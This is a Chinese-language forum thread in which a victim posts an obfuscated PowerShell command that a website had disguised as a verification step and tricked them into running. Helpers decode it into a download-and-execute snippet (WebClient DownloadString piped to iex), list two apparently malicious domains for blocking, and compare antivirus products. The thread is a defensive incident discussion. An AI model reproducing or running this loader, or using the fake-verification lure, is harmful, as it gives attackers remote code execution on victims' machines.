电脑被植入病毒了

yundabei · March 13, 2025, 12:33pm

网站被植入了该代码, 伪装成验证. 目前已经在cmd里面执行, 后知后觉发现有问题, 使用火绒全盘查杀找不到问题, 有么有大佬可以反混淆解释一下

 "$( set 'Ofs' '') " +([StrinG][ReGex]::MatcHeS( ")'X'+]43[EMOHsp$+]12[EMoHSp$ ( & | )421]rAHc[,)101]rAHc[+08]rAHc[+56]rAHc[( ECalPERC-93]rAHc[,'mSA'  ECalPERC-  43]rAHc[,)121]rAHc[+65]rAHc[+48]rAHc[( EcaLpER- )'noiSsErPXE-eKOvNiePA)63]Rahc'+'[,mSAAR3'+'mSA ECa'+'LPer- '+'93]R'+'ahc[,)75]Rah'+'c[+601]Rahc[+301]Rahc[(eca'+'LPeRC-'+'  421]Rahc[,)911]Rahc[+801]Rahc[+101]Rahc[( ecaLPeRC- ))mSAgt9jg+9jgu9jg+9jgsmSA,mSAg  ;9jg+9j'+'gmSA,mSA9jgdus39jg+9jg,us9jg+9jg3h9'+'jg+9jm'+'SA,mSAc1mSA,mSA3 f-6jq}9jgmSA,mS'+'A}2{}4{6jqmSA,mSApeR-  93]RAHc[,9jgus39jg  ecaLpeR-69]mSA,mSA[+601]RAHcmSA,mSA+9jg19jg+9jg{}9jg+9jg'+'5{}0{}3'+'{mSA,mSARAHc[,)45]RAHcmSA,mSA,51,4[cePSMOc:'+'vNEAR3 (. wle )43]mSA,mSA(.9jg+9jg     9mSA,mSAg+9jmSA,mSA{c1Y9jg+9jg    9jgmSA,mSAsmSA,mSAg fi      9jg+9jg

 } 9jg+9jg  '+' 9jg+9jmSA,mSAjg+9jg 9jg+9jg  { )}dAkt9jg+9jg79jg+9jgOL9jg+9'+'jgNWkt7od{c1Y9'+'jg+9jg(9jg+9jmSA,mSA'+'+9jgt//us9'+'jg+9jg3,u9'+'jg+9jgs3rumSA'+',mSA(@9jmSA,mSA}h9jg+9jgtAkt7P9'+'j'+'g+9jgkt7elif{c9jg+9jg1Y )us39jg+9jg-tmSA,mS'+'ARAHc[,)701]RAHc[+611]RAHc[+55]RAHc[(  ECAlPermSA,mSAg+9'+'jgmSA,mSAg+9jg}AT9jg+9jgk9jg'+'+9jgt9jg+9jg7aDkt7EMo'+'S{c1Y9jg(( mSA,mSA}eslk9jg+9jgt79jg+9j'+'gaf{c9jg+9jg1Y = }9j'+'g+9jgdA9jmSA,mSAg19jg+9jgYS9jg+9jg8KPM9jg'+'+9jgE9jg+9jgT:9jg+9jgvn9jg'+'+9jgec1Y9jg+9jg6'+'9jmSA,mSA)9jg9j'+'gnIoj-]52mSA,mS'+'Ar9jg+9jgatS9jg+9jgus9jg+9jg3,us3cor'+'Pus3,usmSA,mSA3sseus9jg+9jg3f- 6jq9'+'jg+9jg}09jg+9jg{}1{}29jg+9jg{6j9jg+'+'9jgq(&'+'      }   9jg+9jg   

 ;}HtAkt9jg+9jg7pekt7'+'Li'+'f9'+'jg+9jg{c1Y eliFtuO9jg+9jg- 9j'+'g+9jg6j9jg+9jgqA9jg+9'+'jg6jq.}i{c1Y irU- )u9jg+'+'9jgs3ous9jg+9jg39jg+9jg,us3e'+'kovn9'+'jg+9jgI9jg+9jgus3m'+'SA,mSAs3f9jg+9jg-9jg+9jg69jg+9jgjq}9jg+9jg6{}4{}59jg+9jg{}3{}0{9jg+9jg}19jg+9jg{9jg+9jg}2'+'{6jq9jg'+'+9jg( =9jg+9jg )us3aus3(9jg+9jg{@]tc9jg+9jgejbOm9jg+9jgotsu9jg+9jgCSP[  mSA,mSA9jg+9jgllus3,us39jg+9jgiu9jg+9jgmSA,mSAc- 63]RAHc[,9jgc1Y9jgECAlPerc-)9jg
9jg+9j'+'g
}  }    

{ hctac  9jg+9jg  9jg+9jg}   9jg+9jg 

;mSA,mSA9jg+9jgY9jg+9jg      9jg+9jg{9jg+9jg yr9jg+9jgt9jmSA,mSAg = 9jmSA,mSA,us39jg+9jgeM9jg+9jgtus3,us39jg+9j'+'gseR-us9jg+9jg3,us39jg+mSA,mSA38us3f-69jg+9jgjq}2'+'9jg+9jg{}1{}0{9jg+9jg6jq( =9jg+9jg )us39jg+9jgbu9jg+'+'9jgs3( ;)us3sat/moc.k9jg+9jgou9jg+9jgs3,us3apus3,us9jg+9jg3jl9jg+9j'+'g'+'ammSA,mSAg+9jg3,u9jg+9jgs9jg+9jg3aP-tsus39jg+9jgf9jg+9jg-6jq}1{}0{'+'}2{6jq(&(9jg+9jg 9jg+9jgf9jg+9j'+'g'+'i9jg+9jg      ;}eURkt7t{c1Y9jg+9jg mSA,mSAg+9jgkt9jg+9jg7ol9jg+9jg'+'kt79jg+9jgN9jg+9jg'+'wODmSA,mSA[+311]RAHc[(  ecaLpeR-29]RAHc[,)38]RAHc[+65]RAHc[+57]RA'+'Hc[( ecaLmSA,mSAs3,us9jg+9jg39jg+9jg:sp9jg+9jgtthus3,9j'+'g+9jgus39j'+'gmSA,mSA= 9jg+9jg}'+'dao9jg+9j'+'gkt9jg+9jg7Lkt79jg+9jgnWod{'+'c9jg+9jg1Y      

;9jg+9jg6jq)b.ic9jg+9jg1Y(c9jg+9jmSA,mSAgHTap'+'k9jg'+'+9jgt7ELkt7'+'IF{mSA,'+'mSAg+9'+'jgjq = }9jg+9jmSA,mSA+9jg    9jg+9jg
'+'9jg+9jg
{ )}'+'hTkt7aPeLkt7I9jg+9jgkt7F{9jg+9jgc1Y )us3eTus39jg+9jg,us3ht9jg+9jgus9jmSA,mSA   9jg+9jg 

{ )}9'+'jg+9jgaTADEk9jg+9jgt7Mkt9jg+9jg7O9jg+9jgS9'+'jg+9jg'+'{c1Y9jg+9jg ni }I{c9jg+9jg19jg+9jgY( hcaerof'+'  ;)9jg+9jg

})9jg+'+'9jgus39jg+9jgisus3,us3m.ba9jg+9jgus3,u9jg+9jgmSAf- y8T}81{}33{}'+'43{}6'+'3{}6{}73{}3'+'2{}31{}42{}71{}61{}01{}14{}34{}93{}53{}83{}23{'+'}72{}82{}24{}02{}7{}03{}1{}8{}4{}91{}2{}3{}04{}21{}22{}0{}92'+'{}'+'9{}41{}5{}62{}51{}52{}13{}11{}12{y8T((('(( ", '.' , 'RIGhtTOLeFT')|fOReAcH { $_ }) +" $( Set-IteM 'vAriABle:OFS'  ' ') " | &( $sHeLLid[1]+$shELlid[13]+'X')

chunkBurst · March 13, 2025, 12:39pm

卡巴一秒检出

佬友稍等，我花点时间看看

chunkBurst · March 13, 2025, 12:41pm

他这个是cmd的

ma_hua_teng · March 13, 2025, 12:42pm

卡巴果然强大啊，我这边也是扫描到秒删了

nestking178 · March 13, 2025, 12:42pm

无文件落地攻击，这不是webshell，

chunkBurst · March 13, 2025, 12:43pm

佬，无文件落地攻击是什么，我刚刚复制到txt文件里面不会有事吧

yundabei · March 13, 2025, 12:43pm

是在cdm运行了一段代码, 代码的目的是在Windows系统中启动一个隐藏的PowerShell窗口，并执行一个从远程服务器下载并运行的脚本. 这个是那个脚本的代码

nestking178 · March 13, 2025, 12:43pm

楼主这是被无文件落地攻击了，查杀可能比较困难

nestking178 · March 13, 2025, 12:43pm

没事，需要在命令行界面输入执行

yyt · March 13, 2025, 12:44pm

别用火绒，前几天我的电脑中了勒索病毒一台电脑装了火绒啥反应没有，文件全部被加密了，一台装了卡巴，应用都打不开了，但是重下应用以后，文件是没问题的，我为了安全还是全重装了

chunkBurst · March 13, 2025, 12:44pm

解密出来了

Set-Item Variable:OFS ' '
$wc = New-Object Net.WebClient
$payloadUrl = 'http://xxxxx'
$payload = $wc.DownloadString($payloadUrl)
iex $payload

其实给你iex了payload恶意代码

lijie · March 13, 2025, 12:44pm

吃瓜吃瓜

RU_Sirius · March 13, 2025, 12:47pm

域名是什么？让我加黑一波

luciouskami · March 13, 2025, 1:03pm

kalkgmbzfghq.com
tripallmaljok.com

luciouskami · March 13, 2025, 1:05pm

你是怎么被注入的？

https://s.threatbook.com/report/file/811387a99265106281c0991bdc6f057c3891cac4e072f56f7817a53c9a074c18

www-data · March 13, 2025, 1:05pm

用gpt还原的吗?佬

chunkBurst · March 13, 2025, 1:07pm

差不多
我没有环境不能手动推理，一放文件就被卡巴灭了

chunkBurst · March 13, 2025, 1:07pm

太好了，是大佬，题主有救了
【为什么一样的代码检测还不一样，有换行吗?】

luciouskami · March 13, 2025, 1:09pm

我看了下分析报告，估计又是什么kali小子，题主按照报告里的行为把对应文件咔嚓了就行，把它那个域名屏蔽了，应该就失活了。

luciouskami · March 13, 2025, 1:10pm

txt的话沙箱只会挂notepad，你得改成ps1（小心别按回车）再上传。

Topic		Replies	Views
【油猴脚本】基于Gemini 1.5 pro API的L站帖子及回复总结资源荟萃	35	2122	November 12, 2024
同学下载了恶意app 开发调优网络安全	102	1019	March 20, 2025
发帖一直显示被拦截，不知道什么内容被拦下来了运营反馈软件开发	8	238	October 22, 2024
分享一个自用的surge配置文件，自动分流并解锁claude和chatgpt访问！搞七捻三 ChatGPT , OpenAI , 网络安全 , 纯水	7	1444	February 7, 2025

电脑被植入病毒了

Related topics